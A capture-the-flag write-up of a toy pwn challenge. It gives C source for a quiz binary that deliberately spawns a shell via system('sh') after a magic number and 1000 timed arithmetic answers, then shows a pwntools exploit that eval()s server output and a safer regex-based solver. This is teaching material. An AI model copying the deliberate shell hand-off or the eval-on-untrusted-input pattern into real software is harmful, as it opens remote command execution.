
A Pwn challenge that is really more like Misc


JieGe


0x01 Preface

I came across a very fun Pwn challenge online. It has no real technical requirements,

but as a first Pwn exercise it is an entertaining little program and quite interesting.

0x02 Code

    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <time.h>
    #include <unistd.h>

    /* SIGALRM handler: fires 90 seconds after the alarm(90) in main(). */
    void handler(int signum){
        puts("Timeout");
        _exit(1);
    }

    int main()
    {
        setvbuf(stdout, 0, 2, 0);   /* 2 == _IONBF: unbuffered, prompts reach the client at once */
        setvbuf(stdin, 0, 2, 0);
        signal(SIGALRM, handler);
        alarm(90);                  /* hard 90 second limit for the whole quiz */

        unsigned seed = (unsigned)time(NULL);
        srand(seed);                /* glibc: srand() seeds the generator random() uses */

        unsigned int magic;
        printf("Give me the magic number :)\n");
        read(0, &magic, 4);         /* 4 raw bytes from stdin, not a decimal string */
        if (magic != 3735928559) {  /* 3735928559 == 0xDEADBEEF */
            printf("Bye~\n");
            exit(0);
        }

        printf("Complete 1000 math questions in 90 seconds!!!\n");
        for (int i = 0; i < 1000; ++i) {
            int a = random() % 65535;
            int b = random() % 65535;
            int c = random() % 3;
            int ans;
            switch(c) {
            case 0:
                printf("%d + %d = ?", a, b);
                scanf("%d", &ans);
                if (ans != a + b) {
                    printf("Bye Bye~\n");
                    exit(0);
                }
                break;
            case 1:
                printf("%d - %d = ?", a, b);
                scanf("%d", &ans);
                if (ans != a - b) {
                    printf("Bye Bye~\n");
                    exit(0);
                }
                break;
            case 2:
                /* a * b can exceed INT_MAX (65534 * 65534 does); the compiled
                   binary wraps it to a 32-bit int, and ans is compared to that */
                printf("%d * %d = ?", a, b);
                scanf("%d", &ans);
                if (ans != a * b) {
                    printf("Bye Bye~\n");
                    exit(0);
                }
                break;
            }
        }
        printf("Good job!\n");
        system("sh");

        return 0;
    }

0x03 Compiling

    gcc pwntools.c -o pwntools
0x04 Analysis

Once we have the binary, take a look at it with checksec:

[screenshot from Ti0s's Blog: checksec output]

All protections are enabled. Don't panic: even with every protection on we can still solve this, because the challenge never requires us to defeat any of them.

Drop it into IDA and use the F5 decompiler:

[screenshot: IDA decompilation of main]

From the decompilation: if the buf variable is not equal to 0xDEADBEEF the program exits. Note that the value is obtained with read(0, ..., 4), which takes 4 raw bytes from stdin rather than parsing a decimal number, so the exploit has to send the little-endian byte encoding of 0xDEADBEEF, not the string "3735928559".

Continuing down:

[screenshot: IDA decompilation of the question loop]

It then wants us to solve 1000 math questions within 90 seconds (alarm(90), with a SIGALRM handler that prints "Timeout" and exits).

[screenshot: IDA decompilation of the end of main]

Once all of them are answered correctly it calls system("sh") and hands us a shell.

0x05 Exploitation

Now let's write the exploit.

First we need pwntools.

I recommend using the Tsinghua PyPI mirror to speed things up; just run pip install pwntools.

[screenshot from Ti0s's Blog] First spin up a Docker container.

    # Python 3 / current pwntools version of the exploit (the original was Python 2)
    from pwn import *
    import ctypes

    p = process('./pwntools')

    # The magic number is read with read(0, &magic, 4): 4 raw bytes, so send
    # the little-endian encoding of 0xDEADBEEF rather than its decimal string.
    p.recvuntil(b'number :)\n')
    payload = p32(0xdeadbeef)
    p.send(payload)

    p.recvline()    # "Complete 1000 math questions in 90 seconds!!!"
    for i in range(1000):
        qes = p.recvuntil(b' = ?').replace(b' = ?', b'').decode().strip()
        print(qes)
        # eval() trusts whatever the server sends; acceptable only because this is
        # a binary we compiled ourselves. The binary computes a * b as a 32-bit int,
        # so wrap the answer the same way (65534 * 65534 overflows int).
        ans = ctypes.c_int32(eval(qes)).value
        p.sendline(str(ans).encode())

    p.interactive()
[screenshot from Ti0s's Blog: running the exploit]
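As an added example, not code from the original post or from Ti0s's Blog: the exploit above feeds whatever the server sends into eval and computes the exact product, while the binary computes a * b as a 32-bit int. The operands go up to 65534, so the product overflows; gcc wraps it in practice, and that wrapped value is what the `ans != a * b` check compares against. The original gets away with sending the exact product on 64-bit glibc, whose %d conversion truncates the oversized value to the same int, but relying on that is fragile. The solver below parses the binary's exact prompt format instead of eval'ing it, rejects anything else, and does the int32 wrap itself. `answer_all`, `FakeQuiz` and its seed are my assumptions for running this offline; `FakeQuiz` imitates the quiz loop with Python's random, so it does not reproduce the real binary's glibc random() sequence.

```python
import random
import re

# Matches exactly the prompt format the binary prints: printf("%d + %d = ?", a, b)
# and the "-" / "*" variants. Anything else is rejected instead of being eval'd.
QUESTION_RE = re.compile(rb'(-?\d+) ([-+*]) (-?\d+) = \?')


def to_int32(n):
    """Wrap an arbitrary Python int to C's signed 32-bit int (two's complement).

    The binary keeps a, b and ans as int and compares ans != a * b, so an
    overflowing product wraps (in practice, with gcc) and we must wrap too.
    """
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n & 0x80000000 else n


def solve(question):
    """Parse one 'a op b = ?' question (bytes, delimiter included) and return
    the int32 answer the binary expects. Raises ValueError on anything else."""
    m = QUESTION_RE.search(question)
    if m is None:
        raise ValueError("unexpected question: %r" % (question,))
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == b'+':
        result = a + b
    elif op == b'-':
        result = a - b
    else:
        result = a * b
    return to_int32(result)


def answer_all(recv_until, sendline, n=1000):
    """Drive the quiz over any tube-like pair of callables (assumed interface).

    recv_until(delim) must return bytes up to and including delim, and
    sendline(data) must send bytes followed by a newline; a pwntools tube's
    p.recvuntil / p.sendline fit directly. Returns the number of questions answered.
    """
    for _ in range(n):
        sendline(str(solve(recv_until(b' = ?'))).encode())
    return n


class FakeQuiz:
    """Constructed stand-in for the binary's quiz loop so the solver can run offline.

    Mirrors the C semantics (operands < 65535, int32 arithmetic, 'Bye Bye~' on the
    first wrong answer) but draws from Python's random, so it does NOT reproduce
    the glibc random() stream of the real binary.
    """

    def __init__(self, n=1000, seed=1234):
        self.rng = random.Random(seed)
        self.n = n
        self.answered = 0
        self.expected = None   # answer to the outstanding question, if any

    def recv_until(self, delim):
        if delim != b' = ?' or self.expected is not None or self.answered >= self.n:
            raise RuntimeError("protocol error")
        a = self.rng.randrange(65535)            # random() % 65535
        b = self.rng.randrange(65535)
        op = '+-*'[self.rng.randrange(3)]        # random() % 3 picks the case
        exact = a + b if op == '+' else a - b if op == '-' else a * b
        self.expected = to_int32(exact)          # what `ans != a op b` compares against
        return ('%d %s %d = ?' % (a, op, b)).encode()

    def sendline(self, data):
        if int(data.decode()) != self.expected:  # scanf("%d") then the comparison
            raise RuntimeError("Bye Bye~")
        self.expected = None
        self.answered += 1


if __name__ == '__main__':
    quiz = FakeQuiz()
    print("answered", answer_all(quiz.recv_until, quiz.sendline), "questions")
```

Against the real target, `answer_all(p.recvuntil, p.sendline)` after sending `p32(0xdeadbeef)` and consuming the "Complete 1000 math questions" line replaces the for loop in the exploit. Only the `*` questions ever overflow, but wrapping is a no-op for `+` and `-` with these operand ranges, so applying it uniformly is correct.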